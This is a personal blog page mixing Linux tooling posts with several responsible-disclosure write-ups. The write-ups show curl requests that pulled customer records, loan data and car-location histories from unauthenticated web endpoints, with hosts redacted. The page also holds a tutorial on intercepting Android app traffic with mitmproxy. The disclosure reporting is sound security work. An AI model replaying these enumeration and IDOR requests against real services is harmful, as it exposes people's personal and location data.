Andrea Scarpino's blog

winaskpass: WSL ssh-add helper using WinCred

2026-01-14T00:00:00Z

TL;DR: ssh-add helper for WSL that stores passphrases in Windows Credential Manager. Get it via cargo install winaskpass and set SSH_ASKPASS=winaskpass.

I’ve been a Linux user for over a decade, or rather twenty years. Even at work, I’ve used Linux for everything, until now: $corporate made a decision that turned my development world upside down. We’re moving to Windows.

I refused to let it win (pun intended). If I had to use Windows, I’d make it feel as much like Linux as possible. Windows is just the UI; my home is the Windows Subsystem for Linux.

From the tools perspective the migration was easy: I had dotfiles and a provision script and the WSL distro was the same, so everything worked just fine. I only had to remove a few UI tool, but the ones I used daily were there. Even my dotfiles were 99% compatible.

The first problem I faced was having to enter my SSH key password evey time I open a fresh WSL session. My setup uses the standard ssh-agent + askpass, but I was missing a keystore. The web searches suggested using gnome-keyring, named pipes or even removing the key’s password. None of these was suitable, and the reason was simple: there was already a keystore, just outside WSL: the Windows Credential Manager.

I looked into how to interact with WinCred from WSL and the setup without needing to configure anything on Windows was to write a tool that generates a PowerShell script and then uses powershell.exe to run it. Ugly at first glance, okay maybe even at second, but the setup is easy as running cargo install winaskpass and setting SSH_ASKPASS=winaskpass. I liked it.

But after speding a few days in Windows I discovered WinGet. A few more winget install commands later I found that binaries installed this way were already in my $PATH (or %PATH%, I’m still not sure which to use!). At this point it was clear that there’s another (cleaner?) way to ship winaskpass: a Windows native tool available via WinGet.

So, to all the Linux refugees on WSL with SSH protected keys, if you want you can set up a SSH_ASKPASS agent with just two simple commands:

cargo install winaskpass and then set SSH_ASKPASS=winaskpass environment variable or via winget.exe install winaskpass and SSH_ASKPASS=winaskpass.exe if you want to avoid the PowerShell call.

Sources are available on GitHub and also mirrored on Codeberg.

Sniffing Android apps network traffic

2022-09-15T00:00:00Z

Back in the day, it was really easy to sniff the network traffic made by apps on Android. You could do it in a few minutes by adding mitmproxy’s certificate and setting the HTTP proxy on your wifi network settings. That was it. But things have changed (for good) and that’s no longer the case. However, I still want to sniff the network traffic made by the Apps in Android.

How? Well, I can’t use my smartphone anymore, but I can set up the Android emulator, install the application via the Google Play Store and sniff the network traffic it generates on my PC \o/

Let’s get started. First, install the Android SDK and create an Android virtual device using Android API 30 and x86 architecture (any API and any architecture is fine). However, we need an image without Google Play Store preinstalled as we need a writable /system folder to inject mitmproxy’s certificate later. That’s okay, because we’ll install the Play Store manually.

echo no | ./Android/Sdk/cmdline-tools/latest/bin/avdmanager create avd -n Pixel_5_API_30 --abi google_apis/x86 --package 'system-images;android-30;google_apis;x86'

Start the virtual device with the additional -writable-system flag which allows us to make /system writable. I also have to unset QT_QPA_PLATFORM= because I’m on wayland and the emulator doesn’t support it.

QT_QPA_PLATFORM= ./Android/Sdk/emulator/emulator @Pixel_5_API_30 -writable-system

Now let’s download the OpenGAPPs that match our API and architecture. Select the pico variant because we don’t need anything else, just the Play Store.

curl -OL 'https://master.dl.sourceforge.net/project/opengapps/x86/20220503/open_gapps-x86-11.0-pico-20220503.zip'

We need to decompress it in order to get and push Phonesky.apk to the virtual device. We also need to whitelist its permissions (thank you to the MinMicroG guys).

unzip open_gapps-x86-11.0-pico-20220503.zip
lzip -d Core/vending-x86.tar.lz
tar xf vending-x86.tar
adb root
adb shell avbctl disable-verification # adb disable-verity makes the emulator crash
adb reboot
adb wait-for-device
adb root
adb remount
adb push vending-x86/nodpi/priv-app/Phonesky/Phonesky.apk /system/priv-app/
curl -O https://raw.githubusercontent.com/FriendlyNeighborhoodShane/MinMicroG/master/res/system/etc/permissions/com.android.vending.xml
adb push com.android.vending.xml /system/etc/permissions/

Now, create a dedicated user to run mitmproxy as it’s written in the documentation:

sudo useradd --create-home mitmproxyuser
sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 443 -j REDIRECT --to-port 8080
sudo -u mitmproxyuser -H bash -c 'mitmproxy --mode transparent --showhost --set block_global=false'

Mandatory copy’n’paste from the mitmproxy documentation page:

Note, as soon as you add the iptables rules, you won’t be able to perform successful network calls until you start mitmproxy.

At this point we are almost there, we just need another step to add the mitmproxy certificate as it’s written in the documentation page:

hashed_name=`sudo openssl x509 -inform PEM -subject_hash_old -in ~mitmproxyuser/.mitmproxy/mitmproxy-ca-cert.cer | head -1`
sudo adb push ~mitmproxyuser/.mitmproxy/mitmproxy-ca-cert.cer /system/etc/security/cacerts/$hashed_name.0
adb shell chmod 664 /system/etc/security/cacerts/$hashed_name.0
adb reboot

You should now have the Play Store, login with your Google account and install the App you need.

That’s it! Happy sniffing!

I went out for dinner and I took some endpoint

2022-02-25T00:00:00Z

Three weeks ago I went out to a pub for dinner. Due to COVID-19 restrictions there are no paper menus anymore and the waitress gave me a card to place my order.

The card she gave me had a QR code and a 5-digit number. I scanned the QR code and opened the website it pointed to. To login I used that 5-digit number. I placed my order. So far so good.

When suddenly a hamburger button caught my attention. I pressed it, but mostly I clicked on the first item in the menu because, judging by its text, it seemed “worth” having a look at the order I had just placed:

Uh?! 4751€?! Definitely not me! To my surprise that page listed many orders, not just mine, and they were also old. Now things were getting interesting.

Once I was back home, I wanted to understand it more. I opened the website again, but I failed to login because my 5-digit number had expired, so I tried incrementing it a few times and it worked :-)

I took a look at the JavaScript files to find the one that makes the request to retrieve the orders:

$.ajax({
  type: "POST",
  url: '/include/ajax.php?f=getlist&t=orders',
  data: {
    src:[
      {
        name:"self_cart_id",
        value:app.table_id,
        compare:"equal"
      }
    ],
    orderby: "id DESC"
  }

Let’s do the same request, changing the value (app.table_id) parameter and see what would happen:

curl 'https://$HOST/include/ajax.php?f=getlist&t=orders' -X POST --data-raw "src%5B0%5D%5Bname%5D=self_cart_id&src%5B0%5D%5Bvalue%5D=1&src%5B0%5D%5Bcompare%5D=equal&orderby=id+DESC"

I got fewer orders. Then I increased the table_id and I got even fewer orders. Mmm, I took a second look at the parameters and then I realized it was a query statement! At this point I played a bit with the parameters until I removed the value parameter completely. Well, now I got 347752 orders and they are even paginated:

"success": 1,
"pag": "1",
"per_pag": 500,
"total_records": 347752,
"total_pages": 696,

Fortunately, there was no sensitive information. I got all the orders made in the last ~2 years from all the pubs scattered around italy (the pub is part of a franchising). There were some Deliveroo/UberEats/Glovo id, but nothing sensitive. Not yet.

Back to the JavaScript file, there were a few interesting calls:

    url: '/include/ajax.php?f=get&t=customers&id='+app.customer_id,
    url: '/include/ajax.php?f=edit_customer&t=self_cart&id='+app.table_id,
    url: '/include/ajax.php?f=getlist&t=categories',
    url: '/include/ajax.php?f=getlist&t=products',
    url: '/include/ajax.php?f=get&t=products&id='+$(this).attr("data-id"),
    url: '/include/ajax.php?f=edit_product&t=self_cart&id='+app.table_id,

I tried with the most tempting, customers, and here we go:

curl 'https://$HOST/include/ajax.php?f=getlist&t=customers'

"success": 1,
"pag": 1,
"per_pag": 500,
"total_records": 11928,
"total_pages": 24,
"rows": [
    {
        "surname": "<REDACTED>",
        "name": "<REDACTED>",
        "email": "<REDACTED>",
        "mobile": "<REDACTED>",
        "addresses": [
            {
                "name": "<REDACTED>",
                "surname": "",
                "address": "<REDACTED>",
                "zipcode": "<REDACTED>",
                "city": "<REDACTED>",
                "province": "<REDACTED>",
                "coord": "44.6<REDACTED>, 10.6<REDACTED>",
                "doorphone": "<REDACTED>",
            }
        ]
        "barcode": "https:\/\/api.$ANOTHER_HOST\/include\/barcode.php?f=png&s=code-128&d=1",

That single request returned 500 out of 11928 results that include full names, phone numbers and addresses of real persons who placed their orders through one of those food delivery apps.

Back to the JavaScript file, the edit_product call is also very tempting (what if I change the price of a product, place my order, and then restore the original price?), but I had already eaten dinner and didn’t try it.

Finally, the $ANOTHER_HOST domain got my attention because it points to a different domain. I googled it and realized that this pub was using an e-commerce made by a company that claims on their website that they serve 570 restaurants in Italy. Which makes that 11928 way larger.

To confirm my suspicion, I first googled the footer text in the e-commerce and found approximately ~100 other websites using it that are affected by the same issue. Then I found others using DNS enumeration targeting the $ANOTHER_HOST domain.

I warned the company about the unauthenticated endpoints and the possible data leak affecting them and their customers. They politely replied that they don’t provide bug bounties and the endpoints have been patched.

I'm back in the boat

2021-06-11T00:00:00Z

In mid-2014 I first heard about Jolla and Sailfish OS and immediately bought a Jolla 1; wrote apps; participated in the IGG campaign for Jolla Tablet; bought the TOHKBD2; applied for (and got) Jolla C.

Sounds like the beginning of a good story doesn’t it?

Well, by the beginning of 2017 I had sold everything (except the tablet, we all know what happened to that one).

So what happened?? I was a happy Sailfish user, but Jolla’s false promises disappointed me.

Yet, despite all that, I still think about Sailfish OS to this day. I think it’s because, despite some proprietary components, the ecosystem around Sailfish OS is ultimately open source. And that’s what interests me. It also got a fresh update which solves some of the problems that where there 5 years ago.

Nowadays, thanks to the community, Sailfish OS can be installed on many devices, even if with some less components, but I’m looking for that complete experience and so I asked on the forum if there was someone willing to sell his Xperia device with or without the license… and I got one for free. Better still, in exchange for some apps!

To decide which applications to create, I therefore took a look at that ecosystem. I started with the apps I use daily on Android and looked for the Sailfish OS alternative (spoiler: I’m impressed, good job guys!).

I am writing them all here because I am sure it will be useful to someone else:

AntennaPod (podcast app) -> PodQast
Ariane (gemini protocol browser)
AsteroidOS (AsteroidOS sync) -> Starfish
Connectbot (ssh client) -> built-in (Terminal)
Conversation (xmpp client) -> built-in (Messaging)
Davx5 (caldav/cardav) -> built-in (Account)
DroidShows (TV series) -> SeriesFinale
Element (Matrix client) -> Determinant
Endoscope (camera stream)
Fedilab (Mastodon client) -> Tooter
ForkHub (GitHub client) -> SailHub
FOSS Browser -> built-in (Browser)
FreeOTP -> SailOTP
Glider (hacker news reader) -> SailHN
K-9 Mail -> built-in (Mail)
KDE Connect (KDE sync) -> SailfishConnect
Keepassx (password manager) -> ownKeepass
Labcoat (GitLab client)
Lemmur (Lemmy client)
MasterPassword (password manager) -> MPW
MuPDF (PDF reader) -> built-in (Documents)
Newpipe (YouTube client) -> YTPlayer
Nextcloud (Nextcloud files) -> GhostCloud
Notes (Nextcloud notes) -> Nextcloud Notes
OCReader (Nextcloud RSS) -> Fuoten
OsmAnd~ (Maps) -> PureMaps
Printing (built-in) -> SeaPrint
QuickDic (dictionary) -> Sidudict
RedMoon (screen color temperature) -> Tint Overlay
RedReader (Reddit client) -> Quickddit
Signal -> Whisperfish
Syncthing (files sync) -> there’s the binary, no UI
Transdroid (Trasmission client) -> Tremotes
Vinyl (music player) -> built-in (Mediaplayer)
VLC (NFS streaming) -> videoPlayer
WireGuard (VPN) -> there’s the binary, no UI
YetAnotherCallBlocker (call blocker) -> Phonehook

So, to me it looks like almost everything is there, except:

a gemini protocol browser
a client for GitLab
a client for Lemmy
a UI for Syncthing
a UI for Wireguard

I’ve already started to write a UI for Syncthing, then maybe I could write the browser for the gemini protocol or rather the GitLab client?

Please consider a donation if you would like to support me (mention your favourite project!).

Many many thanks to Jörg who sent me his Sony Xperia 10 Plus! I hope I don’t disappoint him!

Sharing your loan details to anyone

2021-05-24T00:00:00Z

A week ago, I blogged about a vulnerability in a platform that would allow anyone to download users’ amortisation schedules. This was a critical issue, but it wasn’t really exploitable in the wild as it included a part where you had to guess the name of the document to download.

I no longer trust that platform so I went to their website to remove my loan data from it, but apparently this isn’t possibile via the UI.

I also opened a ticket on their support platform to request removal and they replied that it isn’t possible.

So I went to their website with the intention of replacing the data with a fake one… but there was no longer an edit button!

I’m sure it was there before and in fact the code also confirms that it was there:

However, the platform is based on Magento and so, starting from the current URL, we can easily guess the edit URL, e.g. https://<host>/anagraficamutui/mutuo/edit/id/<n>.

Let’s try 1… bingo!

But wait a minute… this isn’t my loan! Luckily it’s just a demo entry put in by some developer:

Even though it’s a dummy page, we can already see the details of the loan such as the (hopefully) fake IBAN, or the loan total and loan number and even the bank contact person name and email address.

And now take a look at this: if I try to access that page in private mode, then I get the login page. All (almost) well, right?

Nope. Let’s try the same request via curl:

$ curl -s https://<host>/anagraficamutui/edit/id/1 | grep banca

<input type="text" name="istituto_credito" id="istituto_credito" value="banca acme" title="Nome istituto" class="input-text istituto_credito required-entry" />

$ curl -s https://<host>/anagraficamutui/edit/id/1 | grep NL75

<input type="text" name="iban" id="iban" value="NL75xxxxxxxxx" title="Iban" class="input-text iban required-entry validate-iban validate-length maximum-length-27 validate-alphanum" />

Wait a minute, what’s going on?

Well, it turns out that the page sets the location header to redirect you to the login page when there’s no cookie, otherwise it prints the HTML page!

$ curl -s https://<host>/anagraficamutui/edit/id/1 -I | grep location

location: https://<host>/customer/account/login/

Oh-no!

Conclusion

Data from 5723 loans could have been exposed by accessing a specific URL. Details such as IBAN, loan number, loan total and the bank account contact person could have been used to perform spear phishing attacks.

I reported this privacy flaw to the CSIRT Italia and the platform’s DPO. The issue has been solved after 2 days, but I still haven’t heard from them.

Sharing your amortisation schedule to anyone

2021-05-19T00:00:00Z

Last month, my company allowed me to claim some benefits through a dedicated platform. This platform is specifically built for this purpose and allows you to recover these benefits not only in the form of coupons or discount codes, but also as reimbursements for medical visits or interest on mortgage payments.

I wanted to try the latter.

I logged on to the platform and then I filled in all the (many) details about the loan that the plaform asks you to fill in, until I had to upload my amortisation schedule which contains a lot of sensitive data. In fact, a strange thing happened at this step: my file was named document.pdf, but after uploading it was renamed to document_2.pdf.

How do I know? Well, let’s have a look to the UI:

It clearly shows the file name and that’s also a hyperlink. Let’s click then.

The PDF opens in my browser. This is expected, but what happens if we take the URL and try to open it in a private window?? Guess what?

You guessed it.

Let’s have a look to the URL again. It’s in the form: https://<host>/media/mutuo/file/d/o/document_2.pdf.

That’s tempting, isn’t?

I wanted to have some fun and I tried the following:

Both the curl output and the checksums are enough to understand that some document has been downloaded there (but discarded since I didn’t download them to my disk…).

Thus, since the d and o parent folders match the two initial letters of my file, I successfully tried with stuff like:

/c/o/contratto.pdf, /c/o/contratto_2.pdf, …
/c/o/contract.pdf, …
/p/r/prospetto.pdf, …

and it does also work with numbers too (to find this out I had to upload a file named 1.pdf 😇), e.g. https://<host>/media/mutuo/file/1/_/1_10.pdf.

Conclusion

If you have uploaded your amortisation schedule to this platform, that in its website says it has more than 300k users from 3k different companies, well someone may have downloaded it.

I reported this privacy flaw to the CSIRT Italia via a PGP encrypted email; the CSIRT is supposed to write to the company that owns the platform to alert them to the problem, but a week later I still hadn’t heard from either of them. So after a week I pinged the CSIRT again, and they replied with a plain text email telling me that they had opened an internal ticket and were nice enough to embed my initial PGP encrypted email.

Two weeks later (about 21 days since my first mail) the platform fixed the problem (the uploaded file path isn’t deterministic anymore and authentication is in place), but I still haven’t heard from them.

Addendum

Since <host> is a third-level domain in my case, I used stuff like Sublist3r and Amass, but you can also use the online version hosted on nmmapper.com, to perform DNS enumeration and I found ~50 websites, 30 of which are aliases pointing to the same host. In fact, I could replace <host> with each of them and I would always download my document_2.pdf file.

Sway and the Dock station

2020-02-07T00:00:00Z

I just moved permanently from awesome to Sway because I can barely see any difference. Really.

The whole Wayland ecosystem has improved a LOT since last time I used it. That was last year, as I give Wayland a try once a year since 2016.

However, I had to ditch an useful daemon, dockd. It does automatically disable my laptop screen when I put it in the dock station, but it does relies over xrandr.

What to use then?

ACPI events.

The acpid daemon can be configured to listen to ACPI events and to trigger your custom script. You just have to define which events are you interested in (it does accept wildcards also) and which script acpid should trigger when such events occurs.

I used acpi_listen to catch the events which gets triggered by the physical dock/undock actions:

# acpi_listen
ibm/hotkey LEN0068:00 00000080 00004010
[...]
ibm/hotkey LEN0068:00 00000080 00004011
[...]

Then, I setup an acpid listener by creating the file /etc/acpi/events/dock with the following content:

event=ibm/hotkey
action=/etc/acpi/actions/dock.sh %e

This listener will call my script only when an event of type ibm/hotkey occurs, then it tells sway to disable or enable the laptop screen based on the action code. Here’s my dock.sh script:

#!/bin/sh

pid=$(pgrep '^sway$')

if [ -z $pid ]; then
    logger "sway isn't running. Nothing to do"
    exit
fi

user=$(ps -o uname= -p $pid)

case "$4" in
  00004010)
    runuser -l $user -c 'SWAYSOCK=/run/user/$(id -u)/sway-ipc.$(id -u).$(pidof sway).sock swaymsg "output LVDS-1 disable"'
    logger "Disabled LVDS-1"
    ;;
  00004011)
    runuser -l $user -c 'SWAYSOCK=/run/user/$(id -u)/sway-ipc.$(id -u).$(pidof sway).sock swaymsg "output LVDS-1 enable"'
    logger "Enabled LVDS-1"
    ;;
esac

Don’t forget to make it executable!

chmod +x /etc/acpi/actions/dock.sh

And then start the acpid daemon:

systemctl enable --now acpid

Happy docking!

External encrypted disk on LibreELEC

2019-05-05T00:00:00Z

Last year I replaced, on the Raspberry Pi, the ArchLinux ARM with just Kodi installed with LibreELEC.

Today I plugged an external disk encrypted with dm-crypt, but to my full surprise this isn’t supported.

Luckily the project is open source and sky42 already provides a LibreELEC version with dm-crypt built-in support.

Once I flashed sky42’s version, I setup automated mount at startup via the autostart.sh script and the corresponding umount via shutdown.sh this way:

// copy your keyfile into /storage via SSH
$ cat /storage/.config/autostart.sh
cryptsetup luksOpen /dev/sda1 disk1 --key-file /storage/keyfile
mount /dev/mapper/disk1 /media

$ cat /storage/.config/shutdown.sh
umount /media
cryptsetup luksClose disk1

Reboot it and voilà!

Automount

If you want to automatically mount the disk whenever you plug it, then create the following udev rule:

// Find out ID_VENDOR_ID and ID_MODEL_ID for your drive by using `udevadm info`
$ cat /storage/.config/udev.rules.d/99-automount.rules
ACTION=="add", SUBSYSTEM=="usb", SUBSYSTEM=="block", ENV{ID_VENDOR_ID}=="0000", ENV{ID_MODEL_ID}=="9999", RUN+="cryptsetup luksOpen $env{DEVNAME} disk1 --key-file /storage/keyfile", RUN+="mount /dev/mapper/disk1 /media"

Automated phone backup with Syncthing

2019-05-04T00:00:00Z

How do you backup your phones? Do you?

I use to perform a copy of all the photos and videos from my and my wife’s phone to my PC monthly and then I copy them to an external HDD attached to a Raspberry Pi.

However, it’s a tedious job mainly because:

I cannot really use the phones during this process;
MTP works one in 3 times - often I have to fallback to ADB;
I have to unmount the SD cards to speed up the copy;
after I copy the files, I have to rsync everything to the external HDD.

The Syncthing way

Syncthing describes itself as:

Syncthing replaces proprietary sync and cloud services with something open, trustworthy and decentralized.

I installed it to our Android phones and on the Raspberry Pi. On the Raspberry Pi I also enabled remote access.

I started the Syncthing application on the Android phones and I’ve chosen the folders (you can also select the whole Internal memory) to backup. Then, I shared them with the Raspberry Pi only and I set the folder type to “Send Only” because I don’t want the Android phone to retrieve any file from the Raspberry Pi.

On the Raspberry Pi, I accepted the sharing request from the Android phones, but I also changed the folder type to “Receive Only” because I don’t want the Raspberry Pi to send any file to the Android phones.

All done? Not yet.

Syncthing main purpose is to sync, not to backup. This means that, by default, if I delete a photo from my phone, that photo is gone from the Raspberry Pi too and this isn’t what I do need nor what I do want.

However, Syncthing supports File Versioning and best yet it does support a “trash can”-like file versioning which moves your deleted files into a .stversions subfolder, but if this isn’t enough yet you can also write your own file versioning script.

All done? Yes! Whenever I do connect to my own WiFi my photos are backed up!

How my car insurance exposed my position

2017-05-11T00:00:00Z

As many car insurance companies do, my car insurance company provides a satellite device that can be put inside your car to provide your car’s location at any time in any place.

By installing such device in your car, the car insurance company profiles your conduct, of course, but it could also help the police in finding your car if it gets stolen and you will probably get a nice discount over the insurance price (even up to 40%!). Long story short: I got one.

Often such companies also provide an “App” for smartphones to easily track your car when you are away or to monitor your partner…mine (the company!) does too.

Then I downloaded my company’s application for Android, but unluckily it needs the Google Play Services to run. I am a FLOSS evangelist and, as such, I try to use FLOSS apps only and without GApps.

Luckily I’m also a developer and, as such, I try to develop the applications I need most; using mitmproxy, I started to analyze the APIs used by the App to write my own client.

Authentication

As soon as the App starts you need to authenticate yourself to enable the buttons that allow you to track your car. Fair enough.

The authentication form first asks for your taxpayer’s code; I entered mine, and under the hood it made the following request:

curl -X POST -d 'BLUCS§<taxpayers_code>§-1' http://<domain>/BICServices/BICService.svc/restpostcheckpicf<company>

The Web service replies with a cell phone number (WTF?):

2§<international_calling_code>§<cell_phone_number>§-1

Wait. What do we see here? Yes, besides the ugliest formatting ever and the fact the request uses plain HTTP, it takes only 3 arguments to get a cell phone number? And guess what? The first one and the latter are both constants. In fact, if we put an inexistent taxpayer’s code, keeping the same values, we get:

-1§<international_calling_code>§§-100%

…otherwise we get a cell phone number for the given taxpayer’s code!

I shook my head and I continued the authentication flow.

After that, the App asks me to confirm the cell phone number it retrieved is still valid, but it also wants the password I got via mail when subscribing to the car insurance; OK let’s proceed:

curl -X POST -d 'BLUCS§<taxpayers_code>§<device_imei>§<android_id>§<device_brand>-<device_model>_unknown-<api_platform>-<os_version>-<device_code>§<cell_phone_number>§2§<password>§§-1' http://<domain>/BICServices/BICService.svc/restpostsmartphoneactivation<company>

The Web service responds with:

0§<some_code>§<my_full_name>

The some_code parameter changes every time, so it seems to work as a “registration id”, but after this step the App unlocked the button to track my car.

I was already astonished at this point: how the authentication will work? Does it need this some_code in combination with my password at each request? Or maybe it will ask for my taxpayer code?

Car tracking

I start implementing the car tracking feature, which allows to retrieve the last 20 positions of your car, so let’s analyze the request made by the App:

curl -X POST -d 'ASS_NEW§<car_license>§2§-1' http://<domain>/BICServices/BICService.svc/restpostlastnpositions<company>

The Web service responds with:

0§20§<another_code>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>

WTH?!? No header?!? No cookie?!? No authentication parameters?!?

Yes, you’d be right: you just need a car license and you get its last 20 positions. And what’s that another_code? I just write it down for the moment.

I couldn’t believe it, I initally thought (or hoped) they stored my IP somewhere so I’m authorized to get this data now, so let’s try from a VPN…oh damn, it worked.

Then I tried with an inexistent car license and I got:

-2§TARGA NON ASSOCIATA%

which means: “that car license is not in our database”.

So what we could get here with the help of crunch? Easy enough: a list of car licenses that are covered by this company and last 20 positions for each one.

I couldn’t stop there.

The Web client

This car insurance company also provides a Web client which allows more operations, so I logged in to analyze its requests and althought it’s hosted on a different domain, and it also uses a cookie for almost any request, it performs one single request to the domain I previously used. Which isn’t authenticated and caught my attention:

curl http://<domain>/<company>/(S(<uuid>))/NewRemoteAuthentication.aspx?RUOLO=CL&ID=<another_code>&TARGA=<car_license>&CONTRATTO=<foo>&VOUCHER=<bar>

This one replies with an HTML page that is shown in the Web client:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
    <title>NewRemoteAuthentication</title>
    <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1" />
    <meta name="CODE_LANGUAGE" Content="C#" />
    <meta name="vs_defaultClientScript" content="JavaScript"/>
    <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie7" />
        <!--<meta content="IE=EmulateIE10" name="ie_compatibility" http-equiv="X-UA-Compatible" />-->
        <meta name="ie_compatibility" http-equiv="X-UA-Compatible" content="IE=7, IE=8, IE=EmulateIE9, IE=10, IE=11" />
</HEAD>
    <body>
    <form name="Form1" method="post" action="/<company>/(S(<uuid>))/NewRemoteAuthentication.aspx?RUOLO=CL&amp;ID=<another_code>&amp;TARGA=<car_license>" id="Form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwNzEwODIsJFNAgEPKAJDIeBsdSpc2libGVnZGRic5McHC9+DqRx0H+jRt5O+/PLtw==" />

            <iframe id="frm1" src="NewRicerca.aspx" width="100%" height="100%"></iframe>


<SCRIPT language="JavaScript">
<!--
self.close
// -->
</SCRIPT>
</form>
</body>
</HTML>

It includes an iframe (sigh!), but that’s the interesting part!!! Look:

From that page you get:

the full name of the person that has subscribed the insurance;
the car model and brand;
the total amount of kilometers made by the car;
the total amount of travels (meant as “car is moving”) made by the car;
access to months travels details (how many travels);
access to day travels details (latitude, longitude, date and time);
access to months statistics (how often you use your car).

There’s a lot of information here and these statistics are available since installation of the satellite device.

The request isn’t authenticated so I just have to understand the parameters to fill in. Often not all parameters are required and then I tried by removing some of them to find out which are really needed. It turns out that I can simplify that as:

curl http://<domain>/<company>/(S(<uuid>))/NewRemoteAuthentication.aspx?RUOLO=CL&ID=<another_code>&TARGA=<car_license>

But there’s still an another_code there…mmm, wait it looks like the number I took down previously! And yes, it’s!

So, http://<domain>/<company>/(S(<uuid>))/NewRicerca.aspx is the page that actually shows all the information, but how do I generate that UUID?

I tried by removing it first and then I got an empty page. Sure, makes sense, how that page will ever know which data I’m looking for?

Then it must be the NewRemoteAuthentication.aspx page that does something; I tried again by removing the uuid from that url and to my surprise it redirected me to the same url, but it also filled the uuid part as path parameter! Now I can finally invoke the NewRicerca.aspx using that uuid and read all the data!

Conclusion

You just need a car license that’s covered by this company to get all the travels made by that car, the full name of its owner and its position in real time.

I reported this privacy flaw to the CERT Nazionale which wrote to the company.

The company fixed the leak 3 weeks later by providing new Web services endpoints that use authenticated calls. The company mailed its users telling them to update their App as soon as possible. The old Web services were shut down after 1 month and half after my first contact with the CERT Nazionale.

I could be wrong, but I suspect the privacy flaw has been around for 3 years because the first Android version of the App uses the same APIs.

I received no bounty.

The company is a leading provider of telematics solutions.

arch-audit

2016-09-25T00:00:00Z

I started a tiny project a couple of days ago: arch-audit.

arch-audit main (and unique) goal is to display the Arch Linux packages that are affected by known vulnerabilities on your system.

To do that, arch-audit parses the CVE page on the Arch wiki, which is maintained by the Arch CVE Monitoring Team.

arch-audit output is very verbose when it’s started without any argument, but two options --quiet (or -q or -qq) and --format (or -f) allows to change the output for your use case. There’s also a third option --upgradable to display only packages that have already been fixed in the Arch Linux repositories.

In my opinion a great use case is the following:

$ ssh www.andreascarpino.it
openssl>=1.0.2.i-1
lib32-openssl>=1:1.0.2.i-1
Last login: Sat Sep 24 23:13:56 2016
$

In fact, I added a systemd timer that executes arch-audit -uq everyday and saves its output to a temporary file that is configured as banner for SSH. Then, every time I log into my server, I get notified about packages that have vulnerabilities, but that already have been fixed. Time to do a system update!

So, now I’m waiting your feedbacks! Have fun!

BTW, Lynis already added arch-audit support!

Choqok 1.6 Beta 1

2016-06-17T00:00:00Z

I’m happy to announce that we will release Choqok 1.6 next month! (mid July)

This will be the first release after the KDE frameworks port and many things have been fixed in those 16 months, including:

Twitter: fix user lists loading (BUG:345641)
Twitter: allow to select any follower when sending a direct message
Twitter: fix searches by username
Twitter: fix searches by hashtag
Twitter: show original retweet time (BUG:343438)
Twitter: fix external URL to access direct messages and tweets
Twitter: send direct message without text limits
Twitter: support to send and view tweets with quoted text
Twitter: allow to delete direct messages
Twitter: always show ‘Mark as read’ button
GNU Social: fix medium attachment to post
GNU Social: allow to send direct messages
Pump.IO: do not show resend button for own posts
Pump.IO: display avatar image in own posts on the right
Pump.IO: do not create a post if there’s no text
Fix removal of accounts with spaces in their name
Add scalable versions of Choqok icon
Check the result of external URL opening to report any failure (BUG:347525)
Fixed a bug that overwrite an account with the same alias if you use the same alias
Do not allow to send quick posts with no text
Always use HTTPS when available
ImageView: dropped Twitpic and Tweetphoto support (service are dead)
A couple of segmentation fault fixed

Oh, we also added official support for Friendica!

But there’s still a lot to do!

Please join the KDE translation team and help us with translations or try this 1.6 beta and report any bug or, still, join the development team and fix the open bugs.

Together we can make the next release a new starting point for Choqok!

From Ghost To Nanoc

2015-10-06T00:00:00Z

I completed my blog migration from Ghost to nanoc.

About 2 years ago I did setup a blog on blog.as.it using Ghost. It’s UI was very minimal and I liked the default theme (Casper) a lot.

However, I kept nanoc for my main website, until I decided to give Hakyll a try. It’s not that nanoc didn’t satisfy me at that time, but that I was fascinated by Haskell - I’m still fascinated by Haskell, but I’ve no much time to play with it, while I play with Ruby more often.

